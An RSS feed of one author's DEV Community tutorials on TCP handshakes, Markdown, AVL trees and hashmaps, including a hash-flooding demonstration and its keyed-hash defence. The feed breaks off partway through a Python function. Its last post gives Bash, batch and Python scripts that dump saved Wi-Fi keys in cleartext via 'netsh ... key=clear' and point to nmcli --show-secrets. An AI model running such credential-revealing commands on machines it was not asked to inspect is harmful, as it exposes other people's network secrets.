<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:dc="http://purl.org/dc/elements/1.1/">
  <channel>
    <title>DEV Community: Muhammad Usman</title>
    <description>The latest articles on DEV Community by Muhammad Usman (@codeninjausman).</description>
    <link>https://dev.to/codeninjausman</link>
    <image>
      <url>https://media2.dev.to/dynamic/image/width=90,height=90,fit=cover,gravity=auto,format=auto/https:%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Fuser%2Fprofile_image%2F1029620%2F3fe0da39-bf80-4053-852e-0e575006e54a.jpg</url>
      <title>DEV Community: Muhammad Usman</title>
      <link>https://dev.to/codeninjausman</link>
    </image>
    <atom:link rel="self" type="application/rss+xml" href="https://dev.to/feed/codeninjausman"/>
    <language>en</language>
    <item>
      <title>TCP, UDP, and the Three-Way Handshake</title>
      <dc:creator>Muhammad Usman</dc:creator>
      <pubDate>Fri, 14 Jul 2023 06:47:57 +0000</pubDate>
      <link>https://dev.to/codeninjausman/tcp-udp-and-the-three-way-handshake-54o9</link>
      <guid>https://dev.to/codeninjausman/tcp-udp-and-the-three-way-handshake-54o9</guid>
      <description>&lt;p&gt;TCP (Transmission Control Protocol) and UDP (User Datagram Protocol) are both transport layer protocols used in computer networks to enable communication between devices. They have different characteristics and are suitable for different types of network applications.&lt;/p&gt;

&lt;p&gt;TCP is a connection-oriented protocol that provides reliable and ordered delivery of data packets. It establishes a virtual circuit between the sender and receiver and ensures that data is received without errors and in the correct order. TCP achieves reliability through various mechanisms, such as acknowledgments, retransmissions, and flow control. It is commonly used for applications that require error-free and ordered delivery, such as web browsing, email, and file transfer.&lt;/p&gt;

&lt;p&gt;On the other hand, UDP is a connectionless protocol that offers a lightweight and low-latency communication mechanism. Unlike TCP, UDP does not establish a dedicated connection before transmitting data. It simply encapsulates data into packets and sends them to the destination without any guarantee of delivery or order. UDP is useful for real-time applications where low latency is critical, such as streaming media, online gaming, and DNS (Domain Name System) lookups.&lt;/p&gt;

&lt;p&gt;The Three-Way Handshake, also known as the TCP handshake, is a process that TCP uses to establish a connection between two devices. It is essential for initiating a reliable and ordered data transfer. The handshake involves three steps:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;SYN (Synchronize): The client sends a TCP segment with the SYN flag set to the server. Its sequence number is the client's initial sequence number (ISN); a modern stack combines a clock with a keyed hash of the connection's addresses and ports (RFC 6528) so that an off-path attacker cannot predict it. The client enters the SYN-SENT state and waits for a response.&lt;/li&gt;
&lt;li&gt;SYN-ACK (Synchronize-Acknowledgment): If the server is willing to accept the connection, it replies with a segment that has both the SYN and ACK flags set. Its sequence number is the server's own ISN, and its acknowledgment number is the client's ISN plus one, confirming receipt of the SYN. The server enters the SYN-RECEIVED state.&lt;/li&gt;
&lt;li&gt;ACK (Acknowledgment): Finally, the client acknowledges the server's SYN-ACK with a segment that has the ACK flag set. Its sequence number is the client's ISN plus one (the SYN consumed one sequence number) and its acknowledgment number is the server's ISN plus one. The client enters the ESTABLISHED state, and the server does the same when it receives this ACK, after checking that the acknowledgment number matches its own ISN plus one.&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;At this point the TCP connection is established and both sides can exchange data. If a step fails or times out, the connection is not established and the initiator retransmits its SYN. Between steps 2 and 3 the server holds a half-open connection in SYN-RECEIVED; a SYN flood fills that table with SYNs whose final ACK never arrives, which is the problem SYN cookies were introduced to address.&lt;/p&gt;

&lt;p&gt;The Three-Way Handshake lets both devices agree on their initial sequence numbers and confirm that the other side is reachable and willing to talk. Those agreed numbers are the foundation for the acknowledgment, retransmission and flow-control mechanisms TCP uses during the transfer.&lt;/p&gt;
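
&lt;p&gt;The following Python model of the exchange is an added example, not code from the original post. Both endpoints are small state machines; the sequence and acknowledgment numbers follow the rules above (the SYN consumes one sequence number, every ACK carries the peer's ISN plus one) with 32-bit wrap-around, and each side rejects a segment whose acknowledgment number does not match its own ISN plus one, which is the check that forces an off-path attacker to guess the ISN. The ISNs of 100 and 300 in the demo are arbitrary values chosen for readability; leaving isn unset picks random ones, as a real stack would.&lt;/p&gt;

```python
import secrets
from dataclasses import dataclass
from enum import Enum, auto

SEQ_MOD = 2 ** 32   # sequence numbers are 32-bit and wrap around


class State(Enum):
    CLOSED = auto()
    LISTEN = auto()
    SYN_SENT = auto()
    SYN_RECEIVED = auto()
    ESTABLISHED = auto()


@dataclass(frozen=True)
class Segment:
    """The handshake-relevant fields of a TCP header."""
    syn: bool
    ack: bool
    seq: int            # sequence number
    ack_num: int = 0    # acknowledgment number, meaningful only when ack is set


def random_isn():
    # Real stacks derive the ISN from a clock plus a keyed hash of the connection
    # 4-tuple (RFC 6528); 32 random bits give the same unpredictability here.
    return secrets.randbelow(SEQ_MOD)


class Endpoint:
    def __init__(self, name, isn=None):
        self.name = name
        self.state = State.CLOSED
        self.snd_nxt = random_isn() if isn is None else isn  # next seq we will send
        self.rcv_nxt = None                                   # next seq we expect

    def listen(self):
        self.state = State.LISTEN

    def connect(self):
        """Step 1 (client): send SYN. The SYN flag itself consumes one sequence number."""
        seg = Segment(syn=True, ack=False, seq=self.snd_nxt)
        self.snd_nxt = (self.snd_nxt + 1) % SEQ_MOD
        self.state = State.SYN_SENT
        return seg

    def receive(self, seg):
        """Feed one incoming segment; return the reply segment, or None."""
        if self.state is State.LISTEN and seg.syn and not seg.ack:
            # Step 2 (server): SYN-ACK acknowledges client ISN + 1 and carries our own ISN.
            self.rcv_nxt = (seg.seq + 1) % SEQ_MOD
            reply = Segment(syn=True, ack=True, seq=self.snd_nxt, ack_num=self.rcv_nxt)
            self.snd_nxt = (self.snd_nxt + 1) % SEQ_MOD
            self.state = State.SYN_RECEIVED
            return reply
        if self.state is State.SYN_SENT and seg.syn and seg.ack:
            # Step 3 (client): the SYN-ACK must acknowledge exactly our ISN + 1,
            # otherwise it is stale or forged (a real stack answers with RST).
            self._check_ack(seg)
            self.rcv_nxt = (seg.seq + 1) % SEQ_MOD
            self.state = State.ESTABLISHED
            return Segment(syn=False, ack=True, seq=self.snd_nxt, ack_num=self.rcv_nxt)
        if self.state is State.SYN_RECEIVED and seg.ack and not seg.syn:
            # Step 3 (server): only an ACK of our ISN + 1 completes the connection.
            # An off-path attacker who spoofed the SYN never saw our ISN, so this
            # check is what forces them to guess all 32 bits.
            self._check_ack(seg)
            self.state = State.ESTABLISHED
            return None
        raise ValueError(f"{self.name}: unexpected segment in state {self.state.name}")

    def _check_ack(self, seg):
        if seg.ack_num != self.snd_nxt:
            raise ValueError(f"{self.name}: ack {seg.ack_num} does not match expected {self.snd_nxt}")


def handshake(client, server):
    """Run the three segments between two endpoints and return them in order."""
    server.listen()
    syn = client.connect()
    syn_ack = server.receive(syn)
    ack = client.receive(syn_ack)
    server.receive(ack)
    return syn, syn_ack, ack


if __name__ == "__main__":
    c, s = Endpoint("client", isn=100), Endpoint("server", isn=300)
    for seg in handshake(c, s):
        print(seg)
    print(c.state.name, s.state.name)
```

&lt;p&gt;Running it prints the three segments: SYN with seq 100, SYN-ACK with seq 300 and ack 101, ACK with seq 101 and ack 301, and both endpoints end in ESTABLISHED. Feeding the server a final ACK with any other acknowledgment number raises instead of completing the connection.&lt;/p&gt;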

&lt;p&gt;In summary, TCP and UDP are transport layer protocols with different characteristics suited for different network applications. TCP offers reliable and ordered delivery, while UDP provides lightweight and low-latency communication. The Three-Way Handshake is a crucial process used by TCP to establish a connection between devices, ensuring synchronization and reliability in data transmission.&lt;/p&gt;

</description>
      <category>hacking</category>
      <category>certification</category>
    </item>
    <item>
      <title>Markdown: A simple guide</title>
      <dc:creator>Muhammad Usman</dc:creator>
      <pubDate>Tue, 18 Apr 2023 17:11:12 +0000</pubDate>
      <link>https://dev.to/codeninjausman/markdown-a-simple-guide-1f2f</link>
      <guid>https://dev.to/codeninjausman/markdown-a-simple-guide-1f2f</guid>
      <description>&lt;p&gt;Markdown is a lightweight markup language that allows you to create formatted documents using a simple syntax. It was created by John Gruber in 2004, and has since become a popular choice for writing documentation, README files, and even blog posts. In this blog post, we'll explore the basics of Markdown and how you can use it to format your own documents.&lt;/p&gt;

&lt;h2&gt;
  
  
  Basic Syntax
&lt;/h2&gt;

&lt;p&gt;The basic syntax of Markdown is designed to be as simple and intuitive as possible. Here are some of the most commonly used elements:&lt;/p&gt;

&lt;h1&gt;
  
  
  Headings
&lt;/h1&gt;

&lt;p&gt;You can create headings by using one to six hash (#) symbols at the beginning of a line, followed by a space and the heading text. The number of hash symbols sets the level of the heading: one hash symbol gives a top-level heading and six hash symbols give the lowest-level subheading.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;For example:&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;# This is a top-level heading
## This is a subheading
### This is a sub-subheading
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h1&gt;
  
  
  Text Styling
&lt;/h1&gt;

&lt;p&gt;You can style your text in various ways using Markdown:&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Bold&lt;/strong&gt;: To make text bold, surround it with two asterisks (**).&lt;br&gt;
&lt;strong&gt;Italic&lt;/strong&gt;: To make text italic, surround it with one asterisk (*).&lt;br&gt;
&lt;strong&gt;Strikethrough&lt;/strong&gt;: To add a strikethrough to text, surround it with two tildes (~~). This is a GitHub Flavored Markdown extension, not part of the original Markdown syntax, so not every renderer supports it.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;For example:&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;This text is **bold**.
This text is *italic*.
This text is ~~strikethrough~~.
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h1&gt;
  
  
  Lists
&lt;/h1&gt;

&lt;p&gt;You can create both ordered and unordered lists using Markdown. To create an unordered list, simply start each item with a hyphen (-), plus sign (+), or asterisk (*). To create an ordered list, start each item with a number followed by a period (1., 2., 3., etc.).&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;For example:&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;- Item 1
- Item 2
- Item 3

1. First item
2. Second item
3. Third item
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h1&gt;
  
  
  Links and Images
&lt;/h1&gt;

&lt;p&gt;You can add links and images to your Markdown documents using the following syntax:&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Links&lt;/strong&gt;: To create a link, surround the link text with square brackets ([ ]) and follow it immediately with the URL in parentheses (( )).&lt;br&gt;
&lt;strong&gt;Images&lt;/strong&gt;: To add an image, use the same syntax as links, but add an exclamation mark (!) before the square brackets.&lt;br&gt;
&lt;strong&gt;For example:&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;[Click here to visit Google](https://www.google.com)

![Alt text](https://www.example.com/image.jpg)
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h1&gt;
  
  
  Conclusion
&lt;/h1&gt;

&lt;p&gt;Markdown is a simple yet powerful way to format text. It allows you to create documents quickly and easily, without having to worry about complicated formatting or styling. With just a few basic syntax elements, you can create professional-looking documents that are easy to read and understand. So the next time you need to create a document, give Markdown a try!&lt;/p&gt;

</description>
      <category>markdown</category>
      <category>tutorial</category>
      <category>beginners</category>
    </item>
    <item>
      <title>AVL Tree</title>
      <dc:creator>Muhammad Usman</dc:creator>
      <pubDate>Fri, 24 Mar 2023 05:38:33 +0000</pubDate>
      <link>https://dev.to/codeninjausman/avl-tree-46o2</link>
      <guid>https://dev.to/codeninjausman/avl-tree-46o2</guid>
      <description>&lt;p&gt;In this tutorial, you will learn what an avl tree is. Also, you will find working examples of various operations performed on an avl tree in C++ and Python.&lt;/p&gt;

&lt;p&gt;AVL tree is a self-balancing binary search tree in which each node maintains extra information called a balance factor whose value is either -1, 0 or +1.&lt;/p&gt;

&lt;p&gt;AVL tree got its name after its inventor Georgy Adelson-Velsky and Landis.&lt;/p&gt;




&lt;h2&gt;
  
  
  Balance Factor
&lt;/h2&gt;

&lt;p&gt;The balance factor of a node in an AVL tree is the difference between the heights of its left and right subtrees. Either sign convention works as long as it is used consistently; the usual one is:&lt;/p&gt;

&lt;p&gt;Balance Factor = Height of Left Subtree - Height of Right Subtree&lt;/p&gt;

&lt;p&gt;The self-balancing property of an AVL tree is maintained through the balance factor: after every insertion or deletion, the tree is rotated so that the balance factor of every node is again -1, 0 or +1. A balance factor of +2 or -2 at some node is the signal that a rotation is needed there, and a single insertion or deletion can never push it further than that.&lt;/p&gt;
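
&lt;p&gt;The code the post refers to was embedded as gists that are not part of this page. What follows is an added Python implementation written for this page, not the author's original file: insert and delete with the four rotation cases, using the left-minus-right convention above, plus a check_invariants helper that recomputes every height from scratch and verifies every balance factor is -1, 0 or +1. Inserting the keys 1 to 1000 in ascending order, the worst case for a plain binary search tree, gives a tree whose height is about log2 of 1000 instead of 1000.&lt;/p&gt;

```python
from operator import lt   # lt(a, b): strict "a before b" comparison


class Node:
    def __init__(self, key):
        self.key = key
        self.left = None
        self.right = None
        self.height = 1           # height of the subtree rooted here; a leaf is 1


def height(n):
    return n.height if n is not None else 0


def balance_factor(n):
    """Left height minus right height, the convention used in this post."""
    return height(n.left) - height(n.right) if n is not None else 0


def _update(n):
    n.height = 1 + max(height(n.left), height(n.right))


def _rotate_right(y):
    x = y.left
    y.left = x.right
    x.right = y
    _update(y)
    _update(x)
    return x


def _rotate_left(x):
    y = x.right
    x.right = y.left
    y.left = x
    _update(x)
    _update(y)
    return y


def _rebalance(n):
    """Restore the AVL property at n after one insert/delete below it.
    One update can push a balance factor to +2 or -2, never further."""
    _update(n)
    bf = balance_factor(n)
    if bf == 2:                              # left-heavy
        if balance_factor(n.left) == -1:     # left-right case: rotate the child first
            n.left = _rotate_left(n.left)
        return _rotate_right(n)
    if bf == -2:                             # right-heavy
        if balance_factor(n.right) == 1:     # right-left case
            n.right = _rotate_right(n.right)
        return _rotate_left(n)
    return n


def insert(root, key):
    """Ordinary BST insert, then rebalance on the way back up. Duplicates are ignored."""
    if root is None:
        return Node(key)
    if key == root.key:
        return root
    if lt(key, root.key):
        root.left = insert(root.left, key)
    else:
        root.right = insert(root.right, key)
    return _rebalance(root)


def delete(root, key):
    """BST delete (in-order successor for two-child nodes), then rebalance upward."""
    if root is None:
        return None
    if key == root.key:
        if root.left is None:
            return root.right
        if root.right is None:
            return root.left
        succ = root.right
        while succ.left is not None:
            succ = succ.left
        root.key = succ.key
        root.right = delete(root.right, succ.key)
    elif lt(key, root.key):
        root.left = delete(root.left, key)
    else:
        root.right = delete(root.right, key)
    return _rebalance(root)


def inorder(n):
    if n is not None:
        yield from inorder(n.left)
        yield n.key
        yield from inorder(n.right)


def check_invariants(n):
    """Recompute heights from scratch and verify every balance factor is -1, 0 or +1.
    Returns the tree height; raises ValueError on the first violation."""
    if n is None:
        return 0
    lh, rh = check_invariants(n.left), check_invariants(n.right)
    if abs(lh - rh) not in (0, 1):
        raise ValueError(f"balance factor {lh - rh} at key {n.key}")
    if n.height != 1 + max(lh, rh):
        raise ValueError(f"stale height at key {n.key}")
    return n.height


def build(keys):
    root = None
    for k in keys:
        root = insert(root, k)
    return root


if __name__ == "__main__":
    tree = build(range(1, 1001))   # ascending keys: a plain BST would become a 1000-deep list
    print("height:", check_invariants(tree), "root:", tree.key)
```

&lt;p&gt;check_invariants is the test a practitioner should keep around while changing rotation code: it does not trust the stored heights, so a rotation that forgets to call _update on one node is caught immediately.&lt;/p&gt;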









&lt;h2&gt;
  
  
  Complexities of Different Operations on an AVL Tree
&lt;/h2&gt;

&lt;p&gt;&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--X005a0gP--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/oe71sp4fwiyfpb2wfw7n.png" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--X005a0gP--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/oe71sp4fwiyfpb2wfw7n.png" alt="Complexity" width="880" height="132"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Because the balance factors bound the height to O(log n), searching, inserting and deleting each take O(log n) time in both the average and the worst case; a plain binary search tree degrades to O(n) on sorted input.&lt;/p&gt;




&lt;h2&gt;
  
  
  AVL Tree Applications
&lt;/h2&gt;

&lt;ul&gt;
&lt;li&gt;For indexing large records in databases&lt;/li&gt;
&lt;li&gt;For searching in large databases&lt;/li&gt;
&lt;/ul&gt;

</description>
      <category>datastrutures</category>
      <category>cpp</category>
      <category>python</category>
    </item>
    <item>
      <title>Hashmaps</title>
      <dc:creator>Muhammad Usman</dc:creator>
      <pubDate>Wed, 22 Mar 2023 07:21:07 +0000</pubDate>
      <link>https://dev.to/codeninjausman/hashmaps-4p7</link>
      <guid>https://dev.to/codeninjausman/hashmaps-4p7</guid>
      <description>&lt;h2&gt;
  
  
  Definition
&lt;/h2&gt;

&lt;p&gt;Hashmaps, also known as hash tables or dictionaries, are a fundamental data structure used to store and retrieve key-value pairs efficiently. Each key is passed through a hash function, which converts it into an integer; that integer is reduced to an index into an array of slots called buckets, and the pair is stored in, and later retrieved from, the bucket at that index.&lt;/p&gt;

&lt;p&gt;The process of adding a key-value pair to a hashmap involves the following steps:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;The hash function takes the key as input and produces a hash code, an integer that represents the key in a compact, standardized form.&lt;/li&gt;
&lt;li&gt;The hash code is reduced (typically with a modulo by the number of buckets) to an index into the bucket array.&lt;/li&gt;
&lt;li&gt;If another key already occupies that index, a collision has occurred, and the collision resolution strategy decides where the new pair goes: appended to that bucket's chain, or placed in another slot found by probing.&lt;/li&gt;
&lt;li&gt;If the bucket is empty, the new key-value pair is stored there.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;When retrieving a value from a hashmap, the process is similar:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;The hash function is applied to the key to compute the hash code.&lt;/li&gt;
&lt;li&gt;The hash code is reduced to the index of the bucket where the pair would have been stored.&lt;/li&gt;
&lt;li&gt;The bucket is searched for a record whose key equals the lookup key (hash codes can collide, so the key itself must be compared); its value is returned, or, if no such record exists, the key is not in the hashmap.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Hashmaps have several advantages over other data structures for storing key-value pairs. First, insertion, lookup and deletion run in O(1) expected time. Second, memory grows in proportion to the number of entries stored. Finally, hashmaps are dynamic: when the table fills up it is resized and every entry is rehashed into the larger bucket array.&lt;/p&gt;

&lt;h2&gt;
  
  
  Implementation
&lt;/h2&gt;


&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;class HashTable:
    """Separate-chaining hash table: each bucket is a list of (key, value) records."""

    def __init__(self, size):
        self.size = size
        self.hash_table = self.create_buckets()

    def create_buckets(self):
        return [[] for _ in range(self.size)]

    def _bucket(self, key):
        # hash() maps the key to an integer; the modulo picks one of `size` buckets
        hashed_key = hash(key) % self.size
        return self.hash_table[hashed_key]

    def _find(self, bucket, key):
        # Index of the record holding `key` inside the bucket, or None if absent
        for index, (record_key, _record_val) in enumerate(bucket):
            if record_key == key:
                return index
        return None

    def set_val(self, key, val):
        bucket = self._bucket(key)
        index = self._find(bucket, key)
        if index is None:
            bucket.append((key, val))      # new key: chain it onto the bucket
        else:
            bucket[index] = (key, val)     # existing key: overwrite the value

    def get_val(self, key):
        bucket = self._bucket(key)
        index = self._find(bucket, key)
        if index is None:
            return "No record found"
        return bucket[index][1]

    def delete_val(self, key):
        bucket = self._bucket(key)
        index = self._find(bucket, key)
        if index is not None:
            bucket.pop(index)

    def __str__(self):
        # One bucket per line, so chains (collisions) are visible at a glance
        return "\n".join(str(bucket) for bucket in self.hash_table)
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;Disadvantages:&lt;/strong&gt;&lt;br&gt;
Hashmaps also have drawbacks. The most significant is collisions: if many keys land in the same bucket, lookups degrade from O(1) towards O(n). That degradation can be forced deliberately. In a hash-flooding (hash collision) attack, a client who knows the hash function submits thousands of keys chosen to collide, for example as form fields or JSON keys, and every lookup on that table becomes a linear scan, turning a cheap request into a denial of service.&lt;/p&gt;

&lt;p&gt;Collisions are handled with chaining (the colliding records are kept in a list hanging off the bucket, as in the implementation above) or open addressing (other slots are probed until an empty one is found), and the table is resized when its load factor grows. Flooding is prevented by making the hash unpredictable rather than merely well distributed: runtimes such as CPython hash strings with SipHash under a random per-process key, so an attacker cannot compute which keys will collide.&lt;/p&gt;
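
&lt;p&gt;To make the attack and the fix concrete, here is an added example that is not part of the original post. It fills a chained table with attacker-chosen keys twice: once under a predictable hash (the sum of the key's code points, for which every anagram collides) and once under a keyed hash (BLAKE2b in keyed mode, standing in for SipHash) with a secret the attacker never sees. The keys are constructed anagrams of a ten-letter string; longest_chain() is the number of comparisons a worst-case lookup costs.&lt;/p&gt;

```python
import hashlib
import itertools
import secrets


def weak_hash(key):
    """Deterministic and attacker-predictable: the sum of the key's code points.
    Every anagram of a string collides, as does anything tuned to the same sum."""
    return sum(ord(c) for c in key)


def keyed_hash(key, secret):
    """BLAKE2b in keyed mode (8-byte output). Without `secret` an attacker cannot
    pick keys that share a bucket; CPython uses SipHash with a per-process key
    for str hashing in the same way."""
    digest = hashlib.blake2b(key.encode("utf-8"), key=secret, digest_size=8).digest()
    return int.from_bytes(digest, "big")


class ChainedTable:
    """Minimal separate-chaining table, parameterised by its hash function."""

    def __init__(self, size, hash_fn):
        self.size = size
        self.hash_fn = hash_fn
        self.buckets = [[] for _ in range(size)]

    def _bucket(self, key):
        return self.buckets[self.hash_fn(key) % self.size]

    def set(self, key, val):
        bucket = self._bucket(key)
        for i, (k, _) in enumerate(bucket):
            if k == key:
                bucket[i] = (key, val)
                return
        bucket.append((key, val))

    def get(self, key):
        # Cost is the chain length: O(1) expected, but O(n) once an attacker
        # has steered n keys into one chain.
        for k, v in self._bucket(key):
            if k == key:
                return v
        raise KeyError(key)

    def longest_chain(self):
        return max(len(b) for b in self.buckets)


def colliding_keys(n, seed="abcdefghij"):
    """Constructed attacker input: n distinct anagrams of `seed`, all with the same weak_hash."""
    return ["".join(p) for p in itertools.islice(itertools.permutations(seed), n)]


def flood(hash_fn, n=2000, size=1024):
    """Insert n attacker-chosen keys and report the longest chain that results."""
    table = ChainedTable(size, hash_fn)
    for key in colliding_keys(n):
        table.set(key, True)
    return table.longest_chain()


if __name__ == "__main__":
    secret = secrets.token_bytes(16)          # fresh per process, never exposed to the client
    print("weak hash, longest chain:  ", flood(weak_hash))
    print("keyed hash, longest chain: ", flood(lambda k: keyed_hash(k, secret)))
```

&lt;p&gt;Under weak_hash all 2000 keys end up in one chain, so the table has become a linked list; under the keyed hash the same keys spread over the 1024 buckets and the longest chain stays in the single digits. The secret is the whole defence: a keyed hash with a fixed, public key is no better than weak_hash once the attacker has read it.&lt;/p&gt;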

</description>
      <category>datastructures</category>
      <category>python</category>
      <category>cpp</category>
    </item>
    <item>
      <title>Get Network Passwords</title>
      <dc:creator>Muhammad Usman</dc:creator>
      <pubDate>Sun, 19 Mar 2023 17:52:02 +0000</pubDate>
      <link>https://dev.to/codeninjausman/get-network-passwords-1ej6</link>
      <guid>https://dev.to/codeninjausman/get-network-passwords-1ej6</guid>
      <description>&lt;p&gt;Welcome to this blog post where I will walk you through the process of retrieving the Wi-Fi password saved on your PC. But before we proceed, we would like to issue a warning for educational purposes only. I do not condone or promote the unauthorized access of any Wi-Fi network without the owner's consent. The method we are going to discuss should only be used for educational purposes, to help you understand how Wi-Fi passwords are stored on your PC and to enable you to better protect your network from potential security breaches.&lt;/p&gt;

&lt;p&gt;With that said, let's dive into the process of retrieving the Wi-Fi password saved on your PC. Many of us have experienced a situation where we want to connect a new device to our Wi-Fi network, but we can't remember the password. Fortunately, your PC stores the Wi-Fi password for each network that you have connected to in the past, and it's relatively easy to retrieve it.&lt;/p&gt;

&lt;h2&gt;
  
  
  Bash (Git Bash or Cygwin on Windows)
&lt;/h2&gt;

&lt;p&gt;This script drives netsh, which is a Windows tool, so it runs under a Bash port on Windows such as Git Bash or Cygwin and does not work on Linux. On a Linux desktop the saved passwords belong to NetworkManager: they are kept in its connection files under /etc/NetworkManager/system-connections/, readable only by root, and nmcli prints them when run as root with its --show-secrets option.&lt;/p&gt;


&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;#!/bin/bash
# netsh is a Windows tool: run this under Git Bash or Cygwin on Windows, not on Linux.

meta_data=$(netsh wlan show profiles)
# netsh prints CRLF line endings in the console code page. tr drops the CRs (otherwise
# they end up inside the profile names); iconv converts from the console code page,
# which is windows-1251 on a Russian system. Use the code page that chcp reports, or
# remove the iconv step on an ASCII-only system.
data=$(echo "$meta_data" | tr -d '\r' | iconv -f "windows-1251" -t "utf-8" | sed -n 's/^ *All User Profile *: //p')
# One profile per array element, so names that contain spaces stay intact
mapfile -t profiles &lt;&lt;&lt; "$data"

printf "%-30s| %-s\n" "Wi-Fi Name" "Password"
printf "______________________________________________\n"

for i in "${profiles[@]}"
do
    results=$(netsh wlan show profile "$i" key=clear | tr -d '\r')
    # Match on the label rather than on an exact run of spaces; empty for open networks
    password=$(echo "$results" | sed -n 's/^ *Key Content *: //p')
    printf "%-30s| %-s\n" "$i" "$password"
done
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Save this file with a suitable name, such as "wifi-passwords.sh". Make sure you set the executable bit for the file by running the following command:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;chmod +x wifi-passwords.sh
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;You can then run the script using:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;./wifi-passwords.sh
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;This will display a list of all saved Wi-Fi networks and their passwords. Note that this script may not work on all systems or may require modifications to work properly.&lt;/p&gt;

&lt;h2&gt;
  
  
  Windows
&lt;/h2&gt;

&lt;p&gt;The same lookup as a Windows batch file, run from Command Prompt where netsh is native. Create a new file with a .bat extension and add the following code:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;@echo off
setlocal enabledelayedexpansion

REM Split only on ":" so profile names that contain spaces are kept whole; the
REM single space after the colon is trimmed with ~1. findstr /C: searches for the
REM literal phrase instead of matching every line that contains either word.
for /f "tokens=2 delims=:" %%a in ('netsh wlan show profiles ^| findstr /C:"All User Profile"') do (
    set "profile=%%a"
    set "profile=!profile:~1!"
    set "password="
    REM tokens=1* keeps everything after the first colon, so keys containing ":" survive
    for /f "tokens=1* delims=:" %%b in ('netsh wlan show profile "!profile!" key^=clear ^| findstr /C:"Key Content"') do (
        set "password=%%c"
        set "password=!password:~1!"
    )
    REM Print outside the inner loop so open networks (no Key Content line) are still listed
    echo !profile! | powershell -Command "$input | Out-Host"
    if defined password (
        echo !password! | powershell -Command "$input | Out-Host"
    ) else (
        echo no key stored: open network
    )
    echo "______________________________________________"
)
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Save this file with a suitable name, such as "wifi-passwords.bat". You can then run the batch file by double-clicking on it. This will display a list of all saved Wi-Fi networks and their passwords.&lt;/p&gt;

&lt;p&gt;Note that the batch file may not work on all systems or may require modifications to work properly. Profile names with characters outside ASCII may also display incorrectly, because Command Prompt uses the console code page (chcp shows which one) rather than UTF-8; piping each line through PowerShell, as the script does, is the workaround for that.&lt;/p&gt;
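
&lt;p&gt;Both scripts above key on exact column widths and, in the batch case, on the console's code page. As an added example that is not part of the original post, here is a Python version that anchors on the labels netsh prints, keeps names and keys containing spaces or colons intact, treats open networks (which print no Key Content line) explicitly, and on Linux does the equivalent through NetworkManager's nmcli, which needs root to reveal a PSK. The SAMPLE_* strings are constructed netsh output for offline testing, not captured from a real machine.&lt;/p&gt;

```python
import platform
import re
import subprocess

# Anchor on the labels netsh prints rather than on a fixed run of spaces, and keep
# everything after the colon, so names and keys with spaces or colons survive.
PROFILE_RE = re.compile(r"^\s*All User Profile\s*:\s*(.+?)\s*$", re.MULTILINE)
KEY_RE = re.compile(r"^\s*Key Content\s*:\s*(.+?)\s*$", re.MULTILINE)


def parse_profiles(show_profiles_output):
    """Profile names from the output of `netsh wlan show profiles`."""
    return PROFILE_RE.findall(show_profiles_output)


def parse_key(show_profile_output):
    """Key Content from `netsh wlan show profile NAME key=clear`, or None for an
    open network, which prints no Key Content line at all."""
    match = KEY_RE.search(show_profile_output)
    return match.group(1) if match else None


def run(cmd):
    # The console code page is not guaranteed to be UTF-8; errors="replace" keeps a
    # non-ASCII profile name from aborting the whole listing.
    return subprocess.run(cmd, capture_output=True, text=True, errors="replace").stdout


def windows_passwords():
    names = parse_profiles(run(["netsh", "wlan", "show", "profiles"]))
    return {n: parse_key(run(["netsh", "wlan", "show", "profile", n, "key=clear"])) for n in names}


def linux_passwords():
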